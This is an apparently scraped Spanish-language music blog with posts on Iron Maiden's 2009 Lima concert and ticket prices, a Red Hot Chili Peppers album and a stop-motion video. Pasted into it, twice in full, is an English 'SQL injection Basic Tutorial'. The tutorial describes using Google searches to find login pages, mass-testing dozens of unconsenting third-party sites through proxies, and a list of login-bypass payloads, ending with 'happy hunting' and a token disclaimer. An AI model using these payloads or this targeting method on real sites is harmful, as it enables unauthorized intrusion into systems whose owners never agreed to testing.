Friday, September 24, 2010
Friday, June 26, 2009
Heavy Metal Louder Than Life Subtitulos Español
Parte 1
Parte 2
Parte 3
Parte 4
Parte 5
Parte 6
Parte 7
Parte 8
Parte 2
Parte 3
Parte 4
Parte 5
Parte 6
Parte 7
Parte 8
Thursday, June 25, 2009
Friday, May 22, 2009
Video Realizado con la Tecnica Stop Motion
Esta es una tecnica de animacion interesante , lo necesario para crear estos efectos es pura imaginacion ,el siguiente video es un ejemplo.
Vegetable Horror film from PenguinsRising on Vimeo.
Saturday, December 13, 2008
Iron Maiden en Peru
Por Fin Iron Maiden en Peru (26 Marzo del 2009)
El grupo británico de heavy metal integrada por:
Steve Harris - bajista
Bruce Dickinson - vocalista
Janick Gers - guitarrista
Dave Murray - guitarrista
Adrian Smith - guitarrista
Nicko McBrain - baterista
Continuando el inmenso éxito internacional de su espectacular 'Somewhere Back in Time World Tour 2008-2009', People & Music se complace en confirmar el concierto de la legendaria banda inglesa en el marco de su primera visita al Perú. Iron Maiden se presentará en el Estadio Nacional de Lima el Jueves 26 de Marzo a las 9:00pm.
Precios:
El grupo británico de heavy metal integrada por:
Steve Harris - bajista
Bruce Dickinson - vocalista
Janick Gers - guitarrista
Dave Murray - guitarrista
Adrian Smith - guitarrista
Nicko McBrain - baterista
Continuando el inmenso éxito internacional de su espectacular 'Somewhere Back in Time World Tour 2008-2009', People & Music se complace en confirmar el concierto de la legendaria banda inglesa en el marco de su primera visita al Perú. Iron Maiden se presentará en el Estadio Nacional de Lima el Jueves 26 de Marzo a las 9:00pm.
Eddie Palco S/. 673.00
Eddie Vip S/. 547.00
The Trooper S/. 406.00
Flight Of Icarus S/. 406.00
Aces High S/. 356.00
Powerslave S/. 256.00
Live After Death S/. 210.00
2 Minutes To Midnight S/. 210.00
The Number Of The Beast S/. 155.00
Running Free S/. 104.00
Run To The Hills S/. 58.00
Tribuna Norte S/. 31.00
* Precios con costo de servicio Tu entrada incluido.
Estas son las Zonas:
Wednesday, January 30, 2008
El nuevo album de red hot chili peppers
Stadium Arcadium es el noveno álbum de estudio del grupo de rock estadounidense Red Hot Chili Peppers, lanzado durante el mes de mayo de 2006.
El álbum está compuesto por dos CDs llamados Jupiter y Mars respectivamente; contiene veintiocho canciones escritas íntegramente por los componentes de Red Hot Chili Peppers. Stadium Arcadium debutó en el número uno del Billboard 200 en los Estados Unidos vendiendo un total de 442.000 copias en la primera semana de su lanzamiento; la segunda semana obtuvo la certificación de disco de oro por parte de la RIAA al haber vendido más de medio millón de copias en los EE.UU. En el Reino Unido, el éxito fue de igual magnitud; de la misma manera, debutó en la primera posición, en su tercera semana el álbum superó las 300.000 copias vendidas y logró la certificación de disco de platino.
En Australia, las ventas continúan siendo excelentes ya que lleva tres semanas consecutivas desde su lanzamiento en el lugar número uno. Finalmente, alrededor del mundo, en menos de dos meses Stadium Arcadium ha vendido más de cinco millones de copias.
El primer corte para promocionar el álbum se titula: "Dani California", que trata de Dani (La chica mencionada en "By The Way"). El sencillo llegó al número seis del Billboard Hot 100 y se mantuvo durante dos semanas; en el Reino Unido debutó en la posición doce y en su segunda semana llegó al número dos en ventas. Su siguiente corte se tituló "Tell Me Baby", mientras que el tercero se llamó "Snow (Hey Oh)".
El cuarto sencillo denominado "Desecration Smile" fue publicado el 12 de Febrero de 2007. Mientras que el quinto, "Hump de Bump", fue el publicado el 7 de Abril de 2007
El sexto single de la banda es "Charlie". Para realizar el video de dicha canción se realizó una competencia en el sitio web youtube.com en el que el video ya a sido elegido por los integrantes.
En una entrevista, Flea dijo que la razón por la que los dos discos se llamarían Mars y Jupiter es que su gira iba a ser galáctica.
SQL injection Basic Tutorial
One of the major problems with SQL is its poor security issues surrounding is the login and url strings.
this tutorial is not going to go into detail on why these string work as am not a coder i just know what i know and it works
SEARCH:
admin\login.asp
login.asp
with these two search string you will have plenty of targets to chose from...finding one thats vulnerable is another question
WHAT I DO :
first let me go into details on how i go about my research
i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs...legally cool...provided by my good friend Gsecur aka ICE..also an Astal member.. http://governmentsecurity.org "thanks mate" .. gives me a chance to concentrate on what am doing and not be looking over my shoulder
INJECTION STRINGS:HOW ?
this is the easiest part...very simple
on the login page just enter something like
user:admin (you dont even have to put this.)
pass:' or 1=1--
or
user:' or 1=1--
admin:' or 1=1--
some sites will have just a password so
password:' or 1=1--
infact i have compiled a combo list with strings like this to use on my chosen targets ....there are plenty of strings about , the list below is a sample of the most common used
there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths...but thats another paper
the one am interested in are quick access to targets
PROGRAM
i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go thought 40 sites cutting and pasting each string ??
combo example:
admin:' or a=a--
admin:' or 1=1--
and so on...it dont have to be admin can be anything you want... the most important part is example:' or 1=1-- this is our injection
string
now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp or whatever
inurl:login.asp
index of:/admin/login.asp
like this: index of login.asp
result:
http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search
17,000 possible targets trying various searches spews out plent more
now using proxys set in my browser i then click through interesting targets...seeing whats what on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so
http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp
and so on...in a couple of hours you can build up quite a list...reason i dont sellect all results or spider for login pages is
i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so to slow for me
i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list...start..now i dont want to go into
problems with users using Ares..thing is i know it works for me...
sit back and wait...any target vulnerable with show up in the hits box...now when it finds a target it will spew all the strings on that site as vulnerable...you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site ...really i need a program that will return the hit with a click on url and ignore false outputs
am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable.
there you go you should have access to your vulnerable target by now
another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-- so it becomes
user=' or 1=1-- just as quick as login process
(Variations)
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
happy hunting
ComSec aka ZSL
http://comsec.governmentsecurity.org
*******************************************
WARNING: the information provided is for educationally purposes only and not to be used for malicious use. i hold no responsibility
for your actions...do the right thing and let admins know ay
this tutorial is not going to go into detail on why these string work as am not a coder i just know what i know and it works
SEARCH:
admin\login.asp
login.asp
with these two search string you will have plenty of targets to chose from...finding one thats vulnerable is another question
WHAT I DO :
first let me go into details on how i go about my research
i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs...legally cool...provided by my good friend Gsecur aka ICE..also an Astal member.. http://governmentsecurity.org "thanks mate" .. gives me a chance to concentrate on what am doing and not be looking over my shoulder
INJECTION STRINGS:HOW ?
this is the easiest part...very simple
on the login page just enter something like
user:admin (you dont even have to put this.)
pass:' or 1=1--
or
user:' or 1=1--
admin:' or 1=1--
some sites will have just a password so
password:' or 1=1--
infact i have compiled a combo list with strings like this to use on my chosen targets ....there are plenty of strings about , the list below is a sample of the most common used
there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths...but thats another paper
the one am interested in are quick access to targets
PROGRAM
i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go thought 40 sites cutting and pasting each string ??
combo example:
admin:' or a=a--
admin:' or 1=1--
and so on...it dont have to be admin can be anything you want... the most important part is example:' or 1=1-- this is our injection
string
now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp or whatever
inurl:login.asp
index of:/admin/login.asp
like this: index of login.asp
result:
http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search
17,000 possible targets trying various searches spews out plent more
now using proxys set in my browser i then click through interesting targets...seeing whats what on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so
http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp
and so on...in a couple of hours you can build up quite a list...reason i dont sellect all results or spider for login pages is
i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so to slow for me
i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list...start..now i dont want to go into
problems with users using Ares..thing is i know it works for me...
sit back and wait...any target vulnerable with show up in the hits box...now when it finds a target it will spew all the strings on that site as vulnerable...you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site ...really i need a program that will return the hit with a click on url and ignore false outputs
am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable.
there you go you should have access to your vulnerable target by now
another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-- so it becomes
user=' or 1=1-- just as quick as login process
(Variations)
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
happy hunting
ComSec aka ZSL
http://comsec.governmentsecurity.org
*******************************************
WARNING: the information provided is for educationally purposes only and not to be used for malicious use. i hold no responsibility
for your actions...do the right thing and let admins know ay
Thursday, November 15, 2007
Subscribe to:
Posts (Atom)